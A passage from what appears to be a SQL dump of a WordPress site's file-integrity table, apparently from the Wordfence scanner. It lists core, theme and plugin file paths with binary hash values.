}�L�no','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/scroll/simplescrollbars.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�o�J�m��E��','}[�V	d���\0��)�Ц��Cy\n��8�?\Z��ZY','',0,'?'),('QT���*�f�P��.�','wp-admin/includes/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Հѷ������#','+B�0j$2f�j�i�\Z���)HٗO=�\\%�','',0,'?'),('QY��1�Tl��Vr<','wp-includes/js/customize-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),('QZ�$�m��c0��\r','wp-content/themes/graphene/images/sprite_master_light.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#F��h�c�a�@��','j�K�ʼav���2\"�9/��\r�HML9}��R�','',0,'?'),('QuoPX��\0��Sڞ','wp-admin/images/bubble_bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�g<ć�I����0','\'+u�W�`-A�����S\'�}S~S��b���','',0,'?'),('Qwa��t%F�%2��','wp-content/themes/twentytwenty/templates/template-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[6i\"Y|���f8K','Hh�E�.P�ڬ�.��M��eMo�@\0��W�','',0,'?'),('Q@\'qei��x~���0','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/runmode/runmode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2f @��\rs�؁R','@��GI��;�X!ë\Z]Zϯ����)e�Fg��','',0,'?'),('Q��cm�uX\Z3�B+��X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VD�\'\'���C��b�x','fkYQ@Y�^,\n�?�J�Y���\0�C�ł��','',0,'?'),('Q����\n�L����\'�','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-spacing-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�FR�ǘ���R�.M','���Y`^��j���4�8���[R���K}2��','',0,'?'),('Q��mh�r\'r���	�Ð','wp-content/themes/simpleshift/parts/tax_tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P�U�����+��','i��M<I�H�Һ�A0:W�H\\�E������K�','',0,'?'),('Q�6�������M��V�','wp-content/themes/Kent/FT/license-html.php',0,'��� �,��ۓ��X��H','��� �,��ۓ��X��H','����Y��XjМ�������%,�]���&k��','',0,'?'),('Q�yv��������rk\0','wp-content/themes/education-hub/third-party/cycle2/js/jquery.cycle2.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?8��Wt�nM�g�	O9z','l��4���`*��|t�\0�����9JX7���','',0,'?'),('Q�pw{�u�3X�<','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����	;�����x','.��zF2�V�^W�,#g�!t���t���g8�','',0,'?'),('Q�t��$oGoE�$�:�','wp-content/plugins/wp-cerber/assets/flags/sy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oi�&\0�0$l6��','�/<7�\n�W�6�H~�G�K \"�L���','',0,'?'),('Q��������€��','wp-content/themes/newsmag/assets/vendors/machothemes/components/searchform.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t{��4��=�{����','I���2�����6=�,�N����`��qK�4','',0,'?'),('Q��6K4������H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bv�J�Y|���O[k��','R\r��½]����(%^V�z �hSG�LSO�','',0,'?'),('Q��-�C-]C����','wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����O�����81','���v$�͏���,��5�6X�~Xʧ��ℐ���','',0,'?'),('Q�`���8�M�8','wp-admin/press-this.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'xq��>�/���EQ�L','>��k�(���B�������h\\�ѫ͜:','',0,'?'),('Q��nyI����`��\rR','wp-content/themes/skt-pathway/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����CbA�A���k','�3��2Xh��.����X\\����8_�l�u�e�','',0,'?'),('Q�sg�w��r��','wp-content/themes/catch-flames/images/headers/nature.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j�X�}x�va�','q�@g�q��tS�R��T���P��g�ǐ��','',0,'?'),('Q��v�+M��!���M','wp-content/themes/education-hub/inc/customizer/option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��y�4�}����<','i�q&h�8�$_�0R�%\'����o�L��f��','',0,'?'),('Q�Y�Qf�7�@2xC','wp-content/themes/twentynineteen/images/pattern_02.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ߢБ^N\0�[1#U','OH[�Byj��[�#��A縬8Ė�_7	r�','',0,'?'),('Q�.ì�\\���XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','դ��q�.�\rl4G�','�˾�6�/(���OE||\'�郊�$emԬ!�','',0,'?'),('Q�����l��g�-��','wp-admin/js/comment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ur�|,:]�_��#','d\0��\\w�|	��w��W?�3 gYaX~]�-�','',0,'?'),('R�v5��W6�`�ھ�','wp-includes/css/dist/nux/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��cڷ�\r�\\Kn]\nO�','h��iu���E���UJc]���\\d`M\Zqi	�սq','',0,'?'),('RVq���e�w?D�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/lint/json-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��ѧ���!U<(��','����m\"7х�uq����/��~�������','',0,'?'),('Rb{����*͆�(��','wp-content/themes/advance/inc/kirki/includes/class-kirki-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^:�NU{x�\n�n���I','�a[a4����\r�8p�Cy\Z8�{�JΫX����','',0,'?'),('R\"Dž���.�x(�','wp-content/themes/graduate/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�{Ms�I>�W�뙘','��Wꛘ�6���#궣7�HA��S�A','',0,'?'),('R0@��bW0M�[�)','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-select2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�>i�1L1��q�E4*','u\0yUM���ɪ���vU�Y`�I�A5xa�vN@','',0,'?'),('R2��t\\��Db����/','wp-content/themes/graduate/assets/plugins/css/animate.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:I�e������y�','��jea��˲�姝ͤ\r��t1�Y��5�H�','',0,'?'),('R3�Us�3��}T��','wp-includes/js/autosave.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0|w{���5l�D\nө��','����U��m�����vk�}�n��V�#IH�','',0,'?'),('R;�c��1���2wzs�','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�B�oDj�.R��','�19�%*s�O}#b�l��?���05C��Nl�','',0,'?'),('RQ�b7f�� |~ۓ�(','wp-admin/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S|�^�p9Y\\\re*.�2',',/;�{�M,��z���+��o{�c�|u��b\"_Q','',0,'?'),('R\\�9����1��`�','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/number.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��;�d�|��^�-�','��A�\r�B@�?X�����F*��Ѹ���','',0,'?'),('Ra��ce��JT�','wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3I�w>��A�\n�','������F��\0O�.Qm+v�Hj�E�odFX�','',0,'?'),('Ren���$?����{�','wp-content/themes/the-best/inc/jetpack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(�w7��+����W���','���l�P����ȨʯX���iy���=�.�6','',0,'?'),('Rf�������ӯ�m8�','wp-content/themes/authorize/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��q��?��L�#$�Ų','��11����`�:�+4Ա���#�*�d','',0,'?'),('RiK�-��6�/','wp-content/themes/wp-simple/inc/kirki/assets/js/customizer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��H��H��m�T','�dL�c�3�E�`�y}8���H��E�>غF�','',0,'?'),('Rj�q�Iӏ\Z�Y&�','wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ăd��O�[�S\nc\0','^o�&[�l����2Zg/�?>��P~C��Iȗ','',0,'?'),('Rmj���\\X����ָQ�','wp-content/plugins/wordfence/css/wf-font-awesome.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��M��ً�V���:','997dI�Ou�-����%enԻ�1�����I','',0,'?'),('R|��\"]sO�<����','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"b���9�B]���2','u�^K���\n���ih��C�d.i�H�-��j�l�','',0,'?'),('R�b�:Z�K��L�','wp-admin/js/application-passwords.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nv�>4��~,�aڛ858','�\ZKok����ӗi0˓���RI��c\0�Oh','',0,'?'),('R�x�4Mp@�9u\n֊ p','wp-includes/images/wpspin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('R��|Rx/�bzn9\0*�J','wp-admin/includes/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L����S�0���','S[��n��+�𙒽�C�w�C�쌑�)n�d','',0,'?'),('R�\\SC�|ju�9��A','wp-includes/js/media-grid.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BN5�d��b�i^&ޖn','��$�#�& v��PS�u{Z�)XÜ����ֱ�','',0,'?'),('R�)����e}�[��','wp-content/themes/saybusiness/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j�*�I�X&�d*','{��mg8�lvWpn��Hm�\"x��0�g��','',0,'?'),('R¥�����Le�q	�&�','wp-admin/js/user-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Za�K�=���l�s�','�>�n�\"S����q��t�\"qz��ي�*pZ#�+x','',0,'?'),('Rщ�j�#D��(��@�','wp-content/themes/advance/images/big-shadow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\RZD1�K�1�\n��','�`G�\n���ӜXө�]��g�5	n8`�\\B\\$}�','',0,'?'),('R��T�E����\0ݸ\'','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/ambiance-mobile.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j��0���{�懨�','���Lpt�Ѡ@����t1Ԡi\Z�9�����%�','',0,'?'),('Rی�AeHi9�53','wp-content/themes/enigma/breadcrums.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZH��7��t�S���','��(�V�!����{Zlx�\Z�u�|�k�@�Z�','',0,'?'),('R۫��?��^��ib]','wp-content/themes/enigma/images/Healthcare.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�U���?�ݺiζ*','!�\0!U:��\'7珻���L�]>��e�n�b�','',0,'?'),('R�H\r0��!�d�?c&','wp-includes/widgets/class-wp-widget-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bb��w�8�[�&�-Y','�@�Ѩ��pw�x�QX��}\r�y��|��?��','',0,'?'),('R�@9$8�>��5','wp-content/themes/newsmag/inc/widgets/posts_grid/layouts/posts_grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��@DO\"I1a\nvB5p','R�(>w#�7\n�}�WS�R�O��w5','',0,'?'),('R�o m����f>��*\\','wp-content/themes/quicksand/template-parts/content-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}y�Jd�]�%@�a2M','V�j�֭���T�=,xM���D��du�)_]ur�','',0,'?'),('R�u���Y;ˬÅ�9�','wp-content/themes/authorize/assets/stylesheets/font-awesome/scss/_core.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ϝ��[w�hPw�','�ƚ����8~����W*T������D�>u�','',0,'?'),('R��k�%����}','wp-content/themes/the-best/js/modernizr.custom.46884.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B���x*[���S','�A�̅��f��$����{D��[Bw�e6K�s','',0,'?'),('S>\rR�mSF\'E%c��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/postmessage.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;��h��(Yf�hg','���I?�wWý�|j�Z�6�0�!\\�I�g','',0,'?'),('S\n�鎜1���2\n[.','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/code.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#3]r,AzF�l�','Z�Qs��[��{�\\?�p�t֑]|���U-�e','',0,'?'),('S��C{[�[���s','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-preset-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��g�}I��/��z',']��#�n��Neb�t.�O�>���i^���ӟ�','',0,'?'),('S���pW���]AV�','wp-content/themes/wp-simple/inc/kirki/includes/scripts/class-kirki-scripts-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';[yˎ�u\'��9�)�e','���ҕm���ޅL�+��\0P��}>���','',0,'?'),('S���G�]�{�v','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/hint/css-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�y1�Lyh��è��','\\PC\'�� ����!m��/$2�8V#B\r�9Qmԇ','',0,'?'),('S\"h���y�؍�l�I�','wp-content/themes/newsmag/assets/images/grey.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4��E�+R	W�PYi��','���*�3I#yc~Ҥ���I��� v�k���z','',0,'?'),('S.FȫA�j���(�:','wp-includes/js/hoverIntent.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�m���\n8��	�','�)�K���%A�Z&�y�`M��U!�i:A�[�','',0,'?'),('S0�־��K/17u���','wp-includes/js/jquery/ui/selectmenu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Wj*m��Es�','�l$1dT��z֬�H\r���*�xQ��,e4e','',0,'?'),('SK��i9�˕�qk�','wp-content/themes/metro-magazine/inc/js/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����������!UQ','��3� ���Q��\r̓ �)U6�;������((','',0,'?'),('SX+7�1?���-','wp-includes/js/jcrop/Jcrop.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��7e�����Q�%K','!��@��X�7JŃ��p�3K�;S*!���L','',0,'?'),('Sg�efD}p���','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-slider-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l7M6Zb��\n9=�','��7&�s�f?��0!���7��\0�t��w�z�','',0,'?'),('Sj�~6��{�����X','wp-admin/css/colors/modern/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��gRȺ#c�٩�','���?~�o,cy2�P��on��`����ϻ}u8:H','',0,'?'),('SzW��NKUS��','wp-includes/blocks/calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�����cE8,\n','�O%�7ܧ�^V�x��n~���\r�8���i.3-','',0,'?'),('S���O[N�.�v�e','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('S��T������/��','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/keymap/vim.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�bs�������~k�','�8��xA�`,��0�au��;?ORO��j���','',0,'?'),('S�C��i1ۭ�j�','wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p��\\E���(��i','4�O���+o�c.`‹_����U��>�8��','',0,'?'),('S����p�>��Wr�YE','wp-comments-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.K��OQ ��ga��','LJ��h��`*�dr�}�6-�߁P�Q��{�','',0,'?'),('S�dlz�s�V7','wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�~МI�XP/��$','�s�em��/�;��֘���� aZ�H`�g3','',0,'?'),('S�,�1��{mA�ȥ\'B�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĉ��/y\'�\ZD��','6�3�!(�Nd�\"��u��\0��p+�^)}`�Ü$�','',0,'?'),('S��t� ��J�9���G','wp-includes/css/dist/block-directory/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IF	�1�P�������','��hbAnIJ��\'��o�;~p%�Z$.\'����-4','',0,'?'),('S��Cu���ߣ\rmZ=��','wp-content/themes/edge/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')(�Iz90�[!�=','�p�r�/�����Wf`}�l��	՜�&','',0,'?'),('S���\n�pލG%�','wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('S�����}C}�c´n\0','wp-content/themes/catch-flames/inc/panel/add_image_scripts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�JN��K����','z�ӝ>�%�_w��ǁ$|�N���x��s�Y\0��','',0,'?'),('S�5���ii����-','wp-content/themes/education-hub/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6����UY8W�~',':�+�*�Ie93.4�u���6ƃ���_Zk_','',0,'?'),('S�MȞ�\n[�l�񡞥','wp-content/themes/gambit/inc/widgets/widget-magazine-posts-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���b��ְ�����','��tdE!���N�9IH�Z*E��i��y����G','',0,'?'),('S�tJ�f%=#�+�v�1','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/mode/htmlmixed/htmlmixed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�P�Sd�H�e�a�','�S�b�̴��O�5��<��$��(���s�� ��','',0,'?'),('S����5BUY���l','wp-content/themes/advance/inc/kirki/assets/scss/controls/multicolor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��UGf\\R��ZG','T�\'�nd���5���:f��65Tj�_|�$��S','',0,'?'),('S��&�az8�Jض9�','wp-includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��AĢ<ݤ9�fK:','�6��-�Պ��涫9����W\"\'�|w�w~�E\n','',0,'?'),('S�b�.�:n_o��\"s��','wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ŵ���f�#!��N1','僉k�Y�(�O(��N\'=X֘�B��x5�','',0,'?'),('S�^�7jK5I6K�2!','wp-includes/Requests/Cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��4�G��FdW(�','1׋��0*�E�3:/��2p��կ�\0K2^�(','',0,'?'),('S���mg�S5�~����','wp-content/themes/enigma/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۣeU#�pf��OpN','}�o\"�@�B�}�o|Y�[l�Z�HSmy-X~��','',0,'?'),('S��0ӽ\nq����\n�5','wp-content/plugins/wordfence/modules/login-security/css/colorbox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��w\ri�컎vL*x�','�N�b���\r̎�/?+\'��bi\'�W�$@�i\0','',0,'?'),('S�i���`�Cb��','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�z��v5Pp�\'��v�','�a[a4����\r�8p�Cy\Z8�{�JΫX����','',0,'?'),('T	�����s&ډ','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/htmlembedded/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�mN�\n����B�X','���Uz1,e:vu?n۽\Zo�\rþ�I�ȫ+�','',0,'?'),('T�r���~�W]�','wp-includes/class-wp-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J0n�N.��yƪb��','�}�u\0tE\n�&���yt2���B���','',0,'?'),('T)�P���2��+	\0	�','wp-content/themes/lovecraft/js/global.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[k��P�a}y7���t','A��C_�8h2BA�p�u�E�P9f3cb�if','',0,'?'),('T+�BK��n�T�>C�','wp-content/themes/newsmag/assets/sass/site/secondary/_widget-slider.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Do��M��fd��~','Z�`K E�A���\\�|�*e�Ҍe�?���1n�','',0,'?'),('T,n�����O=N�/��','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/date.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��������ܵ&�','�]�4��˩SB�4K������7�~�\\��j','',0,'?'),('T5��i$��QL��','wp-content/themes/catch-flames/inc/catchflames-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2!��W暫�\r�\'���','6�݁��-��1X0\"l���_p�`l�j�lKO��','',0,'?'),('T6K?���s� �7(�','wp-includes/customize/class-wp-customize-sidebar-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vj��B���ر���q','��{#�i�`��\0���j���` pǍ+�fF�','',0,'?'),('T:�Dğ.&l�\Z?�&�A','wp-content/plugins/wp-cerber/assets/flags/in.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�weIɻ�j籏��{\n','��4x�\n��<~�z����{��V��Я\"N�','',0,'?'),('T?�?:q׮P��ah\'��','wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���AN�X[`h\0����','�\"xI�B6�E?�����i�\'26�5y/��','',0,'?'),('T?�:��r�ǼohmKCr','wp-content/themes/advance/css/customcss/body_layout.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�֬/��\\���4^�','kLz�{ B:��n2��u03�����(���Ak8Y','',0,'?'),('T?��MJԔx��','wp-content/themes/newsmag/assets/vendors/machothemes/components/gotop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xm�p���\\u*E','�Q�|2�ԧ�kmf�ԲW��_-C�ݎ�^�\0','',0,'?'),('TH���؝P�\ZJ5%�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/neat.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���֖�O�1\"����','�S:j�\\������f���2g����l4�%M/','',0,'?'),('TM����l����','wp-admin/includes/class-wp-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O\'<r,x�ib��$','MqރR�3=E�8C�@^��@ò�~�qv�M���','',0,'?'),('Tb]U���&HEH\\L���','wp-content/themes/graphene/images/bg-gradient.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V.\\�����3�','��.�Q	��~~x�������[��^�0�','',0,'?'),('Tg�cz*n�$���V\\','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/palette.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�Kf�<tv޽{�E','K�TA�ԢF�%\0W�E�7��8�\r�;=��','',0,'?'),('Tma��>�*\\3�3','wp-content/themes/advance/inc/kirki/assets/js/controls/dropdown-pages.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�~|�D�Jt�D�\0x�','����@��L��Y{\"�����:NJ�Dq\"[','',0,'?'),('Tn� @]��rـ9:�t','wp-content/themes/newsmag/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"*�my9��M>~�!�!�','Eɿ\0P���WI$��pw�@P�w�t���UW�y','',0,'?'),('Tw��=��+�6����','wp-includes/js/tinymce/wp-tinymce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����--��T�J�;','��O���w�:�V�^�w�^[\n�	L�\'�6@-�\r�','',0,'?'),('T{\'���g,(:~�G','wp-content/themes/twentynineteen/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڈLBP��En�\\^	��P','�RSV%�6�){��O����x2��N�A���','',0,'?'),('T{��Qmc��7��0\"s','wp-content/plugins/wordfence/css/wf-onboarding.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�Kwt�G��\'�(�','��mǸ�${���&W�>�.{?�Wo�)�=�H�','',0,'?'),('T���N�;�ed<x�','wp-content/themes/exoplanet/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^9a����l�','�7>���f�Ē1-�h�m�^�����W*','',0,'?'),('T�.o@Ψ2�w�v��X�','wp-includes/js/jcrop/jquery.Jcrop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/a��Lru�4�\Z�','���Ϸ��yd�ix�{�p+��n�eځ��f�','',0,'?'),('T���vm?,�a���T4�','wp-includes/ID3/module.audio-video.quicktime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ր��%���3/�*','Z{��[�W�ڤ�ʑ\nM%9I5+�$3�@^�','',0,'?'),('T��v�(��k�\"','wp-content/themes/advance/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٰD��S~��|i5��','��\"�\"Eɍ��@��1���Ns��b}��dS�Z�','',0,'?'),('T�?�G8��r��F`�','wp-content/themes/graduate/inc/customizer/theme-options/single-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k���nb�n�\\Ia��','26^���4�1��i]l��zh��D��^O�_','',0,'?'),('T��Bf뉾J�����','wp-content/themes/wp-simple/inc/kirki/tests/bin/install-wp-tests.sh',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qo3Y�GD��e�Gg(�','�_�Y�3\na�E5<��`��e���I3#4�M��','',0,'?'),('T���\r�fV�+� j�','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxX��JT��bx���','f��x�/�x��G�\n8�5�6�	Z�+','',0,'?'),('T�>��<�_\"g','wp-content/plugins/wp-cerber/assets/flags/nf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2���rJizڜS��','�P�w�.�^}��\Z�ފڝ3q�{���','',0,'?'),('T�.��)m�&����I','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�41l#}�p���zk1','��h��	�_��֚����!E��4�\Zv��F��','',0,'?'),('T܌�7`\0���(�','wp-includes/js/mediaelement/renderers/vimeo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C9���Y�O���','���+�®-FVp�ݨIht�L�iP%K��i��6','',0,'?'),('T�q� S�|����}��','wp-content/themes/brickyard/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������Q�o����%w','Ⱥ@u��\\W�P��qڍ�N���5X(�~��:�I','',0,'?'),('T��G�8ξ>���','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"�LZ���&��4��','����A 